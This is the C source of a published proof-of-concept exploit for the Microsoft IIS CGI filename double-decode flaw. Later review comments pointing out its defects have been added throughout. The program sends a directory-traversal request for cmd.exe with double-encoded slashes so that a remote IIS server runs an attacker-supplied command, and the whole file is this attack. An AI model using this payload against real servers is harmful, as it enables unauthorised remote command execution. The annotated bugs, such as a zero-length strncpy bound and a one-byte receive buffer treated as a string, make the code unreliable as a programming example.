
IIS CGI Filename Decode Error exploit


/*
 *
 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 *
 * DISCLAIMER:    This  is  proof of concept code.  This means, this code
 * may only be used on approved systems in order to test the availability
 * and integrity of machines  during a legal penetration test.  In no way
 * is the  author of  this exploit  responsible for the use and result of
 * this code.
 *
 */
/* Might as well port this one too.
 * vacuum@technotronic.com
 */
#include <stdio.h>
#include <stdlib.h>
#ifdef WIN32
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#endif
#include <sys/types.h>
#include <string.h>
/*
 * Entry point.  argv[1] is the host to resolve and connect to on TCP port 80,
 * argv[2] is the string meant to be appended to the request line.
 *
 * Review notes (code left as published):
 *  - every network call (socket, send, recv) has its return value either
 *    unchecked or checked only for the purpose of printing a message;
 *  - the command buffer copy on the strncpy(cmd, ...) line uses the
 *    destination's current length as the bound, so argv[2] is never copied;
 *  - recvbuffer is a single byte and is never NUL-terminated after recv(),
 *    so the strstr() on it reads past the end of the array.
 */
int main(int argc, char *argv[])
{
        /* Never zeroed: only sin_family, sin_port and sin_addr are set below. */
        struct sockaddr_in sin;
        struct hostent *ht;
        /* One byte only; used both as a string (strstr) and as a byte sink. */
        char recvbuffer[1];
        int create_socket;
        #ifdef WIN32
        WSADATA WSAData;
        #endif
        /* Array initializer: bytes past the literal are zero-filled. */
        char request[8192]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
        char cmd[1024]="";
        printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |\n");
        printf("<filip@securax.be>\n");
        if (argc < 3)
        {
               printf(" -- Usage: iisexec [hostname] [command]\n");
               exit(-1);
        }
        #ifdef WIN32
               if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
                       printf("WSAStartup failed.\n");
                       WSACleanup();
                       exit(-1);
               }
        #endif
        /* gethostbyname() is the obsolete, non-reentrant resolver; only the
         * first address of h_addr_list is used. */
        if ((ht = gethostbyname(argv[1])) == 0)
        {
               #ifndef WIN32
        herror(argv[1]);
               #else
               fprintf(stderr, "Unable to resolve host %s\n",argv[1]);
               #endif
        exit(-1);
    }
        else
               memcpy(&sin.sin_addr, ht->h_addr_list[0], sizeof(sin.sin_addr));
        /* Only the success message is conditional: a failed socket() call
         * (-1) falls through and the descriptor is still passed to connect(). */
        if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
               printf(" -- Socket created.\n");
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
               printf(" -- Connection made.\n");
        else
        {
               printf(" -- No connection.\n");
               /* Socket is not closed on this path (and no WSACleanup on WIN32). */
               exit(1);
        }
        
        /* Modify this value to whichever sequence you want.
        *
        * %255c = %%35c = %%35%63 = %25%35%63 = /
        *
        */
        /* BUG: the bound is strlen(cmd), and cmd was initialised to "", so the
         * bound is 0 and nothing is copied; cmd stays empty from here on. */
        strncpy(cmd, argv[2], strlen(cmd));
        /* The literal is shorter than request, so this copy is terminated and
         * the remainder of the buffer is zero-padded by strncpy. */
        strncpy(request, 
                  "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
                  sizeof(request));
        /* strncat writes up to n bytes plus a terminating NUL, so a bound of
         * sizeof - strlen leaves no room for that NUL if the buffer fills. */
         strncat(request, cmd, sizeof(request) - strlen(request));   
         strncat(request, "\n", sizeof(request) - strlen(request));
        memset(recvbuffer, '\0',sizeof(recvbuffer));
        printf("[%s]\n",request);
        
        /* Sends the entire 8192-byte array (including the zero padding), not
         * the string length; the return value is ignored. */
        send(create_socket, request, sizeof(request), 0);
        /* Reads at most one byte; return value ignored. */
        recv(create_socket, recvbuffer, sizeof (recvbuffer),0);
        /* recvbuffer has no NUL terminator after a successful one-byte recv(),
         * so strstr() scans beyond the array; a 3-char match in a 1-byte buffer
         * is impossible either way, so this branch is effectively always taken. */
        if ( ( strstr(recvbuffer,"404") == NULL ) )
        {
               printf(" -- Command output:\n\n");
               /* Echo the response byte by byte until the peer closes or errors. */
               while(recv(create_socket, recvbuffer, 1, 0) > 0)
               {
                       printf("%c", recvbuffer[0]);
               }
        }
        else
               printf(" -- Wrong command processing. \n");
        close(create_socket);
        /* No WSACleanup() on WIN32 before exiting. */
        exit(0);
}